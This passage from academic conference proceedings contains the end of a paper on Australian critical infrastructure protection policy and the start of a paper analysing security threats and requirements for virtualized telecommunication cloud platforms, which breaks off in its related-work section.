European context and provide an informative contrast.
2. The initial view of the Australian Federal Government
The initial focus of the Australian Federal Government policy was that critical infrastructure protection
was a commercial consideration and related to Information Security (Busuttil and Warren, 2004).The
Australian Federal Government has been aware of the problems that Australian corporations may have
with dealing with these new security issues. The Australian Federal Government has responded by
offering advice for corporations. The initial Australian Government advice (AGD, 1998) suggested ways in
which organisations could reduce Critical Infrastructure Protection risks (Busuttil and Warren, 2004):
Organisations should implement protective security such as passwords etc in accordance to a
defined security standard such as AS/NZS 4444 (Now 17799) (Information Security Management);
Organisations should formally accredit themselves against security standards such as AS/NZS 4444
(17799);
Organisations should raise awareness of security issues such as password security, E-commerce
risks among their staff;
Organisations should train their staff in how to use computer security systems efficiently and
effectively.
This advice was subsequently updated and in 2004 the Australian Government responded with new
security advice (Australian Government, 2004):
The Australian and New Zealand Standard for Risk Management AS/NZS 4360:1999 is the standard
by which all critical infrastructure will be assessed to assist with the review of risk management plans
for prevention (including security), preparedness, response and recovery (PPRR).
275

Matthew Warren and Shona Leitch
In 2004 the Australian Federal Government formally defined the following; “Critical infrastructure is
defined as those physical facilities, supply chains, information technologies and communication networks
which, if destroyed, degraded or rendered unavailable for an extended period, would significantly impact
on the social or economic well-being of the nation, or affect Australia's ability to conduct national defence
and ensure national security” (Australian Government, 2004). In essence this description describes
organisations that exist at a government level or at a corporate level (Australian Government, 2004).
Historically, much of Australia’s infrastructure was originally owned and operated by the public sector at
the federal, state and local government levels (Smith, 2004) however the majority of Australia’s critical
infrastructure has now been privatised and is under private sector ownership. Consequently, protecting
Australia’s critical infrastructure now requires a higher level of cooperation between all levels of
government and the private sector owners. Hence, the federal government has developed a policy for
critical infrastructure protection that focuses broadly on addressing the following strategies (Australian
Government, 2004; AGD, 2004):
Distinguishing critical infrastructures and ascertaining the risk areas;
Aligning the strategies for reducing potential risk to critical infrastructure;
Encouraging and developing effective partnerships with state and territory governments and the
private sector;
Advancing both domestic and international best practice for critical infrastructure protection.
As Warren and Leitch discussed (Warren and Leitch, 2010), the Australian Federal Government
recognised the importance of crucial systems and the development of new industry support mechanisms,
in particular Trusted Information Sharing Network (TISN).
The TISN is a forum in which the owners and operators of critical infrastructure work together by sharing
information on security issues which affect critical infrastructure (TISN, 2007). TISN requires the active
participation of Critical infrastructure Protection owners and operators of Critical infrastructure Protection,
regulators, professional bodies and industry associations, in cooperation with all levels of government,
and the public. To ensure this cooperation and coordination, all of these participants should commit to the
following set of common fundamental principles of Critical infrastructure Protection (TISN, 2007). These
principles are (TISN, 2007, Warren and Leitch, 2010):
Critical infrastructure Protection is centred on the need to minimise risks to public health, safety and
confidence, ensure economic security, maintain Australia’s international competitiveness and ensure
the continuity of government and its services;
The objectives of Critical infrastructure Protection are to identify critical infrastructure, analyse
vulnerability and interdependence, and protect from, and prepare for, all hazards;
As not all critical infrastructure can be protected from all threats, appropriate risk management
techniques should be used to determine relative severity and duration, the level of protective security,
set priorities for the allocation of resources and the application of the best mitigation strategies for
business continuity;
The responsibility for managing risk within physical facilities, supply chains, information technologies
and communication networks primarily rests with the owners and operators;
Critical infrastructure Protection needs to be undertaken from an 'all hazards approach' with full
consideration of interdependencies between businesses, sectors, jurisdictions and government
agencies;
Critical infrastructure Protection requires a consistent, cooperative partnership between the owners
and operators of critical infrastructure and governments;
The sharing of information relating to threats and vulnerabilities will assist governments, and owners
and operators of critical infrastructure to better manage risk;
Care should be taken when referring to national security threats to critical infrastructure, including
terrorism, so as to avoid undue concern in the Australian domestic community, as well as potential
tourists and investors overseas;
Stronger research and analysis capabilities can ensure that risk mitigation strategies are tailored to
Australia’s unique critical infrastructure circumstances.
276

Matthew Warren and Shona Leitch
3. Australia’s critical infrastructure – the alternative view point
During the time that the Australian Federal Government defined National Policy for Critical Infrastructure
Protection, the opposition Australian Labor Party defined their own very different policy and viewpoint.
The following is a time sequence of their policy development:
2001- Initial Policies
In October 2001, as a response to the act of terrorism in New York in September of the same year, the
Australian Labor Party (ALP) which was the Australian opposition of the time led by Kim Beazley
proposed a range of national security reforms. The reforms focussed on three main areas (ALP, 2001):
Improving border security;
Combating terrorism;
Improving national security planning.
It was stated that these reforms were previously in the planning stages but the first announcement was
made only two days after the attack on the World Trade Center. Australia’s border security was
announced by them as a high priority with changes to the coast guard and aviation security regimes
upmost. In terms of the aviation industry this included more counter-terrorism measures including the
Federal Government taking over responsibility for all airport security checks, making sure there is a
visible presence of officers at airports and introducing tighter controls on aviation security information by
amending current laws and regulations (ALP, 2001).
Rather than just concentrating on the physical security controls which were very much in the forefront of
the public’s mind in 2001, the ALP also proposed a range of changes and initiatives in regards to
protecting Australia’s national infrastructure. This focused in on the establishment of a Defence Cyberwarfare
Task Force which would use all the elements and agencies of the current defence force to
counteract cyber security threats and cyber terrorism attacks.
This strategy proposed by the ALP revolved around the concept of “Homeland Security”, this was the first
time this term was used in Australia and the notion of integrating security agencies, expanding the range
of activities and including the national infrastructure (transport, electricity, water, communication systems
etc) as the most important elements was a dramatic leap in the protection of Australia from cyber terrorist
threats.
2003 – 2005 – A Period of Reflection
In 2003, the Australian Labor Party was still the countries opposition party. The department of Homeland
Security was still being advocated by them, so much so that an opposition Security minister was created
whose portfolio encompassed border protection, crime prevention, intelligence-gathering, investigation
and prosecution (ALP, 2003) and they set up the Shadow Department of Homeland Security Portfolio.
In 2005 the notion of a Homeland Security department was still forefront in the ALP’s policies as a way to
address the issues of national security and bring together all of Australia’s defence agencies (as was
done during the 2000 Olympic Games held in Sydney, Australia). They believed that this level of
integration and cohesion was the only way to truly protect Australia and its citizens from the continued
threats and attacks. They outlined a number of cases which they felt supported this proposal (Beazley,
2005):
The alleged involvement of Sydney Airport baggage handlers in an international drug trafficking
syndicate. The Australian Federal Police claims baggage handlers were key players in a conspiracy
to smuggle cocaine worth $15 million into Australia;
Constant warnings from the Transport Workers’ Union, that the Federal government had been aware
of potential security breaches at Australian airports for at least four years and the TWU’s call for
improved security checks of short term employees and the immediate x-ray screening of all baggage
and freight;
Passengers’ baggage containing large amounts of narcotics being diverted to domestic carousels to
avoid Customs inspections;
277

Matthew Warren and Shona Leitch
39 security screeners out of 500 employed at the airport have serious criminal convictions, with a
further 39 convicted of minor matters;
Engineers with unauthorised duplicate keys;
Lack of customs checks on airline staff.
2007 – 2008 From Opposition to Government
The Australian Labor Party in 2007 had moved from being the opposition party to forming Government.
One of their main policies leading into the Federal election was that they would continue with their long
term plan of forming a Department of Homeland Security.
In 2008, the Prime Minister announced that he planned to cancel the long term plans of the ALP to create
the new department on the basis that the integration of all the defence agencies would be too
“cumbersome” (Franklin and Walters, 2008).
Seven years of planning and proposals had disappeared less than a year after an election due to the
complexities of how administration would be dealt with and confusion over how the complex integration
could be achieved (Nicholson, 2008).
The fact that the initial plans arose swiftly after the terrorist attacks in September 2001 may pose
questions as to whether the plans were ill thought out and borne out of the need to react rather than a
sensible, productive and workable policy.
4. Recent Australian Government strategy
The Australian Federal Government (2008) has identified new security challenges, `it is increasingly
evident that the sophistication of our modern community is a source of vulnerability in itself. For example,
we are highly dependent on computer and information technology to drive critical industries such as
aviation; electricity and water supply; banking and finance; and telecommunications networks. This
dependency on information technology makes us potentially vulnerable to cyber attacks that may disrupt
the information that increasingly lubricates our economy and system of government` (Rudd, 2008). This
public acknowledgement by the Australian Prime Minister, Kevin Rudd, identifies the new security
challenges facing critical infrastructure protection and highlighted the following security concerns (Rudd,
2008):
Maintaining Australia’s territorial and border integrity;
Promoting Australia’s political sovereignty;
Preserving a cohesive and resilient society and strong economy;
Protecting Australians and Australian interests both at home and abroad, and
Promoting a stable, peaceful and prosperous international environment; particularly in the Asia-
Pacific region, together with a global rules-based order which enhances Australia’s national interests.
In 2009 the Federal Australian Government has responded to the issues regarding cyber security and
critical infrastructure by proposing a coherent and government led approach to critical infrastructure
protection. The primary objectives identified focus on all areas of Australian society where there are
security risks, e.g. that individuals should be aware and take steps to “protect their identities, privacy and
finances online” (Australian Government, 2009) that businesses and the government operate “secure and
resilient information and communication technologies” and trusted electronic operating environment that
supports Australia’s national security and maximises the benefits of the digital economy (Australian
Government, 2009). The Australian Federal Government also has developed a wide range of new
strategic directions to focus Australia’s cyber security programs (Australian Government, 2009):
Improve the detection, analysis, mitigation and response to sophisticated cyber threats, with a focus
on government, critical infrastructure and other systems of national interest;
Educate and empower all Australians with the information, confidence and practical tools to protect
themselves online;
Partner with business to promote security and resilience in infrastructures, networks, products and
services;
278

Matthew Warren and Shona Leitch
Model best practice in the protection of government ICT systems, including the systems of those
transacting with government online;
Promote a secure, resilient and trusted global electronic operating environment that supports
Australia’s national interest;
Maintain an effective legal framework and enforcement capabilities to target and prosecute cyber
crime;
Promote the development of a skilled cyber security workforce with access to research and
development to develop innovative solutions.
As part of the new Australian Federal Government strategy, a new of number bodies have been
developed with new capabilities. These include (Australian Government, 2009):
CERT (Computer Emergency Response Team) Australia;
This new Government body has moved to a national level to enable a “more integrated, holistic
approach to cyber security across the Australian community”;
Some of the previously formed cyber security activities that were undertaken by numerous different
agencies such as the Australian Government’s Computer Emergency Readiness Team (GovCERT)
have been combined together to form CERT in order to promote a greater (shared) understanding;
provide targeted advice and give Australians a single point of contact.
Cyber Security Operations Centre (CSOC).
The core functions of the CSOC are focused mainly on government, infrastructure and critical private
sector systems and aims to be a source for all issues related to awareness (especially the detection
of sophisticated threats) and a facility to respond to cyber security risks and problems which are of
national importance.
Another key aspect of CSOC is that it provides Australian Defences with a cyber warfare capability and
provides a resource designed to service all government agencies (DSD, 2011).
The Australian Federal Government has started to refocus away from Critical Infrastructure Protection to
Critical Infrastructure Resilience. The Australian Attorney General Robert McClelland announced that
“The time has come for the protection mindset to be broadened – to embrace the broader concept of
resilience”. The aim is to build a more resilient nation – one where all Australians are better able to adapt
to change, where we have reduced exposure to risks, and where we are all better able to bounce back
from disaster” (TISN, 2010).
The Australian Federal Government in 2010 launched the new Critical Infrastructure Resilience Strategy.
The aim of this new strategy is the continued operation of critical infrastructure in the face of all hazards
as this critical infrastructure supports Australia’s national defence and national security and underpins our
economic prosperity and social wellbeing. More resilient critical infrastructure will also help to achieve the
continued provision of essential services to the community (Australian Government, 2010). This new
strategy also deals with new areas such as disaster protection and disaster resilience and this shift in
policy is going to have a major impact upon Australia.
5. Discussion
The major issue facing Australia is the currently adopted distributed model of critical infrastructure
protection and decision making and how that can effectively manage and secure Australia’s critical
infrastructure. Whilst it is commendable that an Australian Federal Government has faced the issue of
critical infrastructure and cyber threats, the fact that this approach attempts to cover the entirety of
Australia may in itself be problematic. There has been some streamlining of operations by nationalising
CERT, however there are still a number of separate agencies that are involved in this process; Attorney-
General’s Department (AGD), the Australian Communications and Media Authority (ACMA), the
Australian Federal Police (AFP), the Australian Security Intelligence Organisation’s (ASIO), the Defence
Signals Directorate (DSD), the Department of Broadband, Communication and the Digital Economy
(DBCDE), the Australian Government Information Management Office (AGIMO), the Joint Operating
Arrangements (JOA) and the Cyber Security Policy and Coordination (CSPC) Committee. It is clear that
there has been an overall Government shift to form two “umbrella” agencies (CERT and CSOC) to
monitor, promote and control cyber threats however complexity will still arise as there as so many sub
agencies that are involved in this process. In an area such as cyber security where speed is often of
upmost importance to limit damage, the interaction of a large number of other agencies will surely slow
279

Matthew Warren and Shona Leitch
this process down. If an Cyber attack occurs in real time against Australia, would they be able to react
and make decisions in real time, or would the distributed model actually impact the decision making
process? Another unique issue that relates to Australia is the federated government system consisting of
a federal government and a number of state governments. A key issue is that when an attack occurs
against an infrastructure at a state level that the response time to escalate the decision making process
to the Federal government may be slow. This time lag could cause serious consequences and limit the
effectiveness of these agencies.
A new factor with the introduction of CSOC is the move away from civilian organisations protecting
Australia’s critical infrastructure and cyber security risks and making defence organisations responsible
for this role. This may heighten the chance of attacks against Australia’s critical infrastructure because it
could be considered a military target. The major shift in Australian policy is the announcement in 2010 of
the move away from Critical Infrastructure Protection to Critical Infrastructure Resilience and the inclusion
of natural disaster into the policy. This will have a major impact upon Australia and the real implications
are still yet to emerge especially with the recent natural disasters in Australia.
6. Conclusion
Australia over the last decade has taken major steps in the protection of its national critical infrastructure.
The Australian model is a workable model that has helped to protect Australian critical infrastructure
against physical and cyber risks. The issue is whether the distributed model will work in a real time
situation and whether the time delays would impacts the decision making processes.
A new emerging issue is the focus upon Critical Infrastructure Resilience and the future impact that this
may have.
References
Australian Labor Party (ALP) (2001). Labor's Better Plan For Defence - A Secure Future, Canberra.
Australian Labor Party (ALP) (2003). ALP News Statement – Development of Homeland Security Portfolio, Canberra.
Attorney-General’s Department (AGDs) (1998). Report of the Interdepartmental Committee on Protection of the
National Information Infrastructure, Available from: http:// law.gov.au/publications/niireport/niirpt.pdf, visited 10 th
March, 2007.
Attorney General Department (AGD) (2004). Critical Infrastructure Protection National Strategy, Available from:
http://www.nationalsecurity.gov.au, Accessed 10 th November, 2007.
Australian Government (2004). Protecting Australia Against Terrorism, Department of the Prime Minister and
Cabinet, Barton, ACT.
Australian Government (2009). Cyber Security Strategy, Attorney Generals Department, Commonwealth of Australia,
ISBN 978-1-921241-99-4.
Australian Government (2010). Critical Infrastructure Resilience Strategy, Attorney Generals Department,
Commonwealth of Australia, ISBN: 978-1-921725-25-8.
Australian Institute of Criminology (2009). Australian Business Assessment of Computer User Security, ISBN 978 1
921532 35 1.
Beazley, K. (2005). A Nation Unprepared: Australia in the Fourth Year of a Long War, Address to the Sydney
Institute, Sydney, 4 th August.
Busuttil, T. and Warren, M. (2004). A risk analysis approach to critical information infrastructure protection,
Proceedings of the 5th Australian Information Warfare and Security Conference, Perth, Western Australia.
Defence Signals Directorate (DSD) (2011). CSOC - Cyber Security Operations Centre, Available from:
http://www.dsd.gov.au/infosec/csoc.htm, Accessed 10 th January, 2011.
Franklin, M and Walters, F (2008). Homeland Security Division Faces Axe, The Australian, May 8 th .
Lewis, T (2006). Critical Infrastructure Protection in Homeland Security, Wiley Publishers, USA, ISBN 978-0-471-
78628-3.
Nicholson, B. (2008). PM abandons “cumbersome” homeland security department. The Australian, December 4th.
Smith, S. (2004). Infrastructure, [Online], NSW Parliament, Available from
http://www.parliament.nsw.gov.au/prod/parlment/publications.nsf/0/C6389C30B0383F9ACA256ECF0006F610,
Accessed 10 th November, 2009.
TISN (Trusted Information Sharing Network) (2007). About Critical Infrastructure, Available from:
http://www.tisn.gov.au, Accessed, 15 th July, 2009.
TISN (Trusted Information Sharing Network) (2010). The Shift To Resilience, CIR News, Vol 7 &, No 1.
Rudd, K. (2008). The First National Security Statement to the Parliament Address by the Prime Minister of Australia,
The Hon. Kevin Rudd MP, URL: http://www.pm.gov.au/media/speech/2008/speech_0659.cfm, Accessed, 10 th
December, 2008.
Warren, M. and Leitch. S. (2010). Commercial Critical Systems and Critical Infrastructure Protection: A Future
Research Agenda, Proceedings of the 2010 European Information Warfare Conference, Thessaloniki, Greece.
280

PhD
Papers
281

282

Security Considerations for Virtual Platform Provisioning
Mudassar Aslam and Christian Gehrmann
Swedish Institute of Computer Science (SICS), Sweden
mudassar.aslam@sics.se
chrisg@sics.se
Abstract: The concept of virtualization is not new but leveraging virtualization in different modes and at different
layers has revolutionized its usage scenarios. Virtualization can be applied at application layer to create sandbox
environment, operating system layer to virtualize shared system resources (e.g. memory, CPU), at platform level or
in any other useful possible hybrid scheme. When virtualization is applied at platform level, the resulting virtualized
platform can run multiple virtual machines as if they were physically separated real machines. Provisioning
virtualized platforms in this way is often also referred to as Infrastructure-as-a-Service or Platform-as-a-Service when
full hosting and application support is also offered. Different business models, like datacenters or
telecommunication providers and operators, can get business benefits by using platform virtualization due to the
possibility of increased resource utilization and reduced upfront infrastructure setup expenditures. This opportunity
comes together with new security issues. An organization that runs services in form of virtual machine images on an
offered platform needs security guarantees. In short, it wants evidence that the platforms it utilizes are trustworthy
and that sensitive information is protected. Even if this sounds natural and straight forward, few attempts have been
made to analyze in details what these expectations means from a security technology perspective in a realistic
deployment scenario. In this paper we present a telecommunication virtualized platform provisioning scenario with
two major stakeholders, the operator who utilizes virtualized telecommunication platform resources and the service
provider, who offers such resources to operators. We make threats analysis for this scenario and derive major
security requirements from the different stakeholders’ perspectives. Through investigating a particular virtual machine
provisioning use case, we take the first steps towards a better understanding of the major security obstacles with
respect to platform service offerings. The last couple of years we have seen increased activities around security for
clouds regarding different usage and business models. We contribute to this important area through a thorough
security analysis of a concrete deployment scenario. Finally, we use the security requirements derived through the
analysis to make a comparison with contemporary related research and to identify future research challenges in the
area.
Keywords: security; trust; virtualization; virtual private server; telecommunication networks, clouds
1. Introduction
Past years we have seen a strong move in the market place towards usage of virtualization technologies.
The virtualization technology we discuss here is the approach when a complete software systme
(including OS) runs on top of a hypervisor. This makes the illusion to the guest system of actuall running
directly upon the real hardware and it is offen referred to as system virutalization (Smith & Nair 2005).
Virtualization allows one to run legacy applications unmodified on new hardware platforms. This is
realized through on-the-fly translation from one hardware instruction set to another with the assistance of
a so called hypervisor or Virtual Machine Monitor (VMM). A hypervisor runs in the most privileged mode
in a system and has full control over vital system resources. A hypervisor-based system not only allows
instruction translation, but above all, increased system utilization as multiple Virtual Machines (VM) can
run simultaneously on a single powerful hardware platform, opening for new business models and a new
business landscape. This implies for example that existing services can rather easily be migrated into
large computing clusters or what often is referred to as the cloud. The term cloud in general refers to
offering a service of any category ranging from application to infrastructure. Generally know broader
categories are Software-as-a-Service (SaaS), Platform-as-a-Service (PaaS) and Infrastructure-as-a-
Service (IaaS) which are sometimes commonly called SPI service models (Security Guidance for Critical
Areas of Focus in Cloud Computing 2009). There are many other possible cloud based services as well,
like Application-as-a-Service, Database-as-a-Service, Storage-as-a-Service, etc. This paper particularly
focuses on platform virtualization which provides a way to offer Virtual Private Server or IaaS in cloud
terminology.
The new flexibility offered by virtualization and cloud based models have a price: increased security risks.
Systems previously physically isolated, might now run on the same machine and consequently opening
up to new attacks between virtual machines running simultaneously on the same hardware. A recent
survey shows that despite potential benefits, companies are reluctant to migrate their businesses from
existing physical platforms to more flexible, scalable and cost effective virtual platforms “due to fear about
security threats and loss of control of data and systems” (CircleID 2009). This shows the importance of
283

Mudassar Aslam and Christian Gehrmann
careful security requirements analysis considering stakeholders’ concerns and most importantly propose
ways to establish stakeholders trust in a business model like cloud which provisions virtual resources.
A telecommunication cloud presents such a use case in which the resource provider offers Infrastructureas-a-Service
using platform virtualization. Despite the scope of a telecommunication cloud as a future
service model, few attempts have been made to do detailed security requirements analysis considering
new dynamics of the proposed systems and required trust building mechanisms between stakeholders to
make an acceptable business model. This paper focuses on these basic but important issues. We
present a virtualized platform provisioning model thereby deriving a telecommunication cloud use case.
Furthermore we focus on security requirements by considering possible security threats in such a model.
The aim of this paper is to identify security requirements which are important for establishing
stakeholders’ trust in offering Infrastructure-as-a-Service to telecommunication operators. The main
contributions of this paper are the following:
We present a telecommunication cloud use case where virtualized telecommunication nodes are
offered to different operators.
We identify, analyze and consolidate security requirements of the stakeholders which form the basis
when creating a secure architecture for a telecommunication cloud.
Finally, we recommend a set of security mechanisms needed to create trust between stakeholders in
future telecommunication clouds.
This paper is organized as follows. In Section 2 we describe the telecommunication cloud scenario. In
Section 3 we present security threats and derive major security requirements. It also identifies
recommended security mechanisms for a trusted telecommunication cloud. Section 4 presents related
work and we conclude in Section 5.
2. Scenario – a telecommunication cloud use case
In the preceding decade, focus of virtual resource provisioning had been on virtualizing data centers
(Berger et al. 2008), (Griffin et al. 2005) but with the rapid expansion of telecommunication networks,
user base and services offered by the operators, there are strong reasons for operators and their
resource providers to adopt more flexible business models to be competitive and in order to meet the
changing and increasing demands of end-customers. In this paper we consider a resource model that is
a step in this direction, allowing several operators to share a common telecommunication infrastructure.
The model includes two major stakeholders - the Provider who provisions virtual telecommunication
platforms instead of physical resources, and the Operator who operates the telecommunication network
utilizing the platforms offered by the provider hence offering services to its end-customers.
In traditional telecommunication networks where the operator owns all physical resources, it needs to
invest in an infrastructure that is able to handle the most demanding traffic peaks. As a consequence of
this, the operator might need to spend on resources which remain under utilized most of the time. From
the operators’ perspective, they like to be able to pay for the exact type and number of resources they
require to service their end customers’ rapidly changing demands. Similarly, the infrastructure provider
must be able to rapidly provision required resources to the operators. By using the recent advancements
in virtualization technologies and emerging cloud service models, the platform provider can instead offer
a Telecommunication Cloud that can be offered to multiple operators. Through scaling effects and
efficient management of this infrastructure, this can result in better resource utilization and an overall
more cost efficient solution similar to most current cloud computing models. Furthermore, provider can
enforce strong licensing techniques restricting operators to use only provisioned resources. An overview
diagram of the stated scenario is shown in Fig.1.
We consider a model where the provider hosts and manages physical platforms and provides basic
hypervisor layer for virtualization. This allows provider to offer complete virtual platforms as a service
which can then be used by different operators to launch their virtual machines. Where provider is
responsible to manage physical platforms and a basic virtualization layer, the operators are responsible
to manage all software layers of their own virtual machines including operating system, antivirus and
firewalls. This implies that the proposed Telecommunication Cloud offers Infrastructure-as-a-Service
(IaaS) as opposed to offering Platform-as-a-Service (PaaS) where the consumer does not get complete
freedom (Linthicum et al. 2009). The launching of virtual machine image and subsequently its
management are done by the operator using Operator Management Clients (OMCs) through a gateway
entity. The gateway entity protects the provider internal network from unauthorized external accesses.
284

Mudassar Aslam and Christian Gehrmann
Similarly, the provider manages the virtualized telecommunication platforms through a Provider
Management Client (PMC). There are other possible network models, for example, a model with an
intermediate entity which takes the responsibility of managing the telecommunication cloud. In such
scenario, the provider outsources its virtual resources to the Cloud Management Entity (CME), which
then provisions the available resources to the operators. The resulting infrastructure would allow a CME
to offer virtual resources from different providers. This paper however focuses on two-role model
involving only a provider and operator.
Figure 1: Our proposed telecommunication cloud scenario
3. Threat and security requirements
One of the most important hurdles for adopting a dynamic virtual telecommunication resource model is
the security. The cloud provider and the operator both fear about new threats which arise due to
simultaneously running virtual machines of different operators on same physical platforms. A successfully
executed attack on a specific platform can cause leak of confidential operator data which in turn might
result in severe business loss or other damage. Moreover, an attacker could use provider resources
illegally if he or she could take control over the target platform. We have analyzed the scenario and
identified major threats that are summarized in Table 1. These threats have in turn been used to identify
stakeholders’ security requirements, which we list in the subsequent sections together with some
recommendations on security solutions meeting the requirements.
285

Table 1: Telecommunication cloud threats
Mudassar Aslam and Christian Gehrmann
Attacker Threat Target
T1 O, A Malicious code installation VMM, VMMGT, VMOPR
T2 P Unintentional installation of hostile S/W VMM, VMMGT
T3 A, O Impersonate provider Gateway, VMMGT
T4 A, O Impersonate a legitimate operator Gateway, VMMGT
T5 P Access run-time or configuration data VMOPR
T6 A Denial of Service attack Provider Network
T7 O Repudiate VM launch VMMGT
T8 O Interfere other operators’ VM VMOPR
T9 O Get confidential data from other operators’ VM VMOPR
O: Legitimate Operator | P : Legitimate Provider | A : Outside attacker | VMMGT : Management VM
3.1 Provider network authentication
Authentication is the binding of an identity to a principal. It is a standard security service which must be
performed for any secure distributed system. Commonly used authentication mechanisms include
passwords, challenge-response, certificates etc (Bishop 2004). With respect to connecting Operator
Management Clients (OMCs), there is a need for authentication on two different levels, mutual
authentication towards the provider network at the gateway and authentication on management VM level.
The latter also applies to connecting Provider Management Clients (PMCs) to reduce threat T3. Mutual
authentication between OMCs and the gateway are needed to mitigate threats T3, T4 and T6. A state-ofthe-art
solution would be to use existing secure session establishment protocols wherever applicable, for
example, using Internet Key Exchange protocol (IKE 2005) for mutual authentication and key exchange
in combination with IPsec (IPsec 2005) for establishing virtual private network (VPN). Authentication by
the management VM of connecting OMCs and PMCs could typically be done as part of the management
protocol that applies (REST, Web Service, SMTP etc.) and would for example be certificate based (see
also Section 3.3 below).
3.2 Platform integrity and authentication
In order to mitigate threats T1 and T2, there is a need to have close control of the software that is
executed on the virtual platforms. When the operator wants to launch its virtual machine on the provider
provisioned virtual platform, he or she should check the configuration and integrity status of the target
platform prior to launching the service. This implies that every piece of code, right from the beginning of
the boot process, is securely reported in some protected storage such that the status later can be verified
by connecting OMCs. Most relevant methods to consider include the Trusted Computing Group trusted
boot and remote attestation principles (TCG 2003). With regard to platform authentication in a cloud
scenario, the operator is actually not interested in identity of the target platform rather its integrity which is
reported in remote attestation. Thus a virtual platform is authenticated if its verified configurations are
trusted according to the policies that the operator applies.
3.3 Authentication, attestation and VM launch protocol
There are two important steps before the launch of a VM. First, the operator require network
authentication (section 3.1) and then remote attestation (section 3.2). From operator’s perspective, it is
important that the VM launch should performed in the same session as these two steps ensure that the
operator VM is launched on a platform which is previously attested. Furthermore, due to platform and
software licensing, the provider would be interested in protection against replay of VM launch command
and protection against later repudiation by the operator (threat T7). In order to mitigate these threats, the
designed protocol should cryptographically bind the authentication, attestation and VM launch sessions.
Therefore, there should be a comprehensively analyzed security protocol for authentication, attestation
and VM launch. The chosen protocol shall provide replay protection, session binding and non-repudiation
of VM launch.
286

3.4 VM isolation
Mudassar Aslam and Christian Gehrmann
VM isolation is an important security requirement for virtual resource provisioning scenarios. In the
virtualized telecommunication cloud environment, the VMs of different operators run on the same
physical machine thus opening room for interfering other operators’ VMs. In order to mitigate this threat
(T8, T9) it is important to ensure that operator VMs must be isolated. This isolation is provided by the
hypervisor layer (Chisnall 2007), (KVM 2007), (VMware 2010). Hence, the security of the whole system
depends upon the correctness of hypervisor. Hypervisors are claimed to provide isolation which is as
strong as physical isolation if not better. However, to ensure this proposition, the size of hypervisor itself
and the code/libraries it is built upon must be kept as small as possible to minimize hierarchical trust
dependencies as recommended by (Doorn 2007). Furthermore, the hypervisor implementation must meet
higher evaluation assurance level (EAL) to get common criteria certification (CC 2011). This is an
important requirement in order to establish operators’ trust in the behavior of the provisioned platform.
The operator would only be required to verify that the provider platform runs the certified hypervisor.
3.5 Confidentiality
Preferably, considering threat T5, the operator would like at VM launch to cryptographically bind the VM
including all its configurations like secure credentials to a trusted resource platform configuration. This
can potentially be partly solved through usage of the sealing techniques as defined by the Trusted
Computing Group (TCG 2003) and specified in (TCG Specification Architecture Overview 2007). The
actual data protection and isolation must be provided by the hypervisor though and sealing techniques
will only help as long as there is a hypervisor layer that the operator can trust with respect to protecting
and isolating VM security critical data (see Section 3.4).
3.6 Secure VM migration
VM migration is a process in which a running operator VM is migrated from one physical platform to
another. The VM migration moves the active memory and execution state of the VM along with VM
security credentials (e.g. keys). The provider must be able to support undetectable migration of operators’
VMs to allow uninterrupted access of the provisioned resources. VM migration is a resource
administration tool which deals with situations like optimization of workload with in provider resource
pools, performing platform hardware maintenance without scheduling downtimes and disrupting
provisioned services. Where VM migration is a provider’s indispensable administrative requirement, the
operator’s security concern is the threat T5. There must be a mechanism for secure migration of
operator’s security credentials e.g. keys. VM migration is an active research topic which should also
consider the protection of security credentials in transit. The TPM based migratable keys (TPM 2007)
could be considered in designing a secure VM migration solution.
3.7 Summary
Trust establishment between cloud stakeholders is one of the major challenges which can be met by
fulfilling a set of security requirements presented in the preceding sections. Security mechanisms like
secure boot, remote attestation, cryptographic bounding of operator VM to the provider platform and
secure hypervisor are the main drivers for trust establishment. 0 presents a summary of the threats
identified in Table 1, corresponding security requirements and recommended mechanisms which could
be applied to mitigate those threats for designing a secure virtual resource provisioning architecture.
Table 2: Summary of threats, requirements and recommended mechanisms for a secure virtual resource
provisioning architecture
Threat Security Requirement Security Mechanism(s)
T1 Platform Integrity Secure boot, Remote attestation
T2 Platform Integrity Secure boot, Remote attestation
T3 Provider Authentication Mutual Authentication (IPSec)
T4 Operator Authentication Mutual Authentication (IPSec)
T5 Confidentiality VM Sealing, Strong Isolation
T5 Secure VM Migration Ongoing research, TPM based migratable keys
287

Mudassar Aslam and Christian Gehrmann
Threat Security Requirement Security Mechanism(s)
T6 Secure Provider Network Firewall, Gateway
T7 Non-repudiation Sign VM launch
T8 VM Isolation Secure and certified hypervisor
T9 VM Isolation Secure and certified hypervisor
4. Related work
Provisioning virtual servers to telecommunication operators is a new field of research. Today’s state-ofthe-art
service offering mechanisms use virtualization and allow us to introduce telecommunication
clouds. Lot of work is being done to address the cloud security in general but not for a telecommunication
cloud. Cloud Security Alliance (CSA 2009) is an organization which is striving to create awareness and
draft security recommendations for the providers and consumers of the cloud. CSA has recently released
(Security Guidance for Critical Areas of Focus in Cloud Computing 2009) which is an exhaustive security
guidance report and covers recommendations for security requirements in different domains of the cloud
infrastructure. Twelve domains have been identified in the report covering governance to operational
aspects of the cloud computing. While this report is a useful tool to identify security requirements, its
scope is too broad to be applied directly on a specific scenario. The recommended approach is to identify
the applicability of a specific domain on the addressed scenario and then consider the security
requirements identified in that domain. This paper provides a focused security requirements analysis for
telecommunication clouds with emphasize on establishing technical trust between the stakeholders. The
security requirements identified in our paper complement the last three domains in the CSA report
namely “Encryption and Key Management”, “Identity and Access Management”, and “Virtualization”.
Trusted Computing Group (TCG 2003) has also started a new initiative recently called (Trusted Multitenant
Infrastructure (TMI) 2010) which aims to define reference models for practical deployment of
trusted cloud or shared infrastructures. The TMI group has not yet released any specification other than a
short white paper (Cloud Computing and Security – A Natural Match 2010) which selects six specific
areas of cloud computing from (Security Guidance for Critical Areas of Focus in Cloud Computing 2009)
to suggest security improvements using TCG technologies. The selected areas include protecting data at
rest and transit, authentication, separation between customers, legal and regulatory issues and incident
response. The white paper hence identifies the areas where TCG mechanisms can provide security and
trust in clouds. These findings are inline with our proposed security mechanisms in Table II. wherein we
propose of using secure boot, remote attestation and sealing capabilities to provide authentication,
integrity and confidentiality.
Other than the above mentioned initiatives which identify security requirements, rest of the work has been
focused on providing solutions for the security requirements identified in this paper. Although these
solutions specifically focus on the security of virtualized data centers, the building blocks of a data center
are somehow similar to our perceived telecommunication cloud scenario. For example, both use
hypervisors to compartmentalize strongly isolated Virtual Machines and both scenarios necessitate trust
establishment in the provisioned platforms. Therefore, we find some solutions addressing the security
requirements identified in this paper. One such solution is introduced in Terra (Garfinkel et al. 2003)
which is a Trusted Virtual Machine Monitor (TVMM). It fulfills the VM isolation requirement by giving the
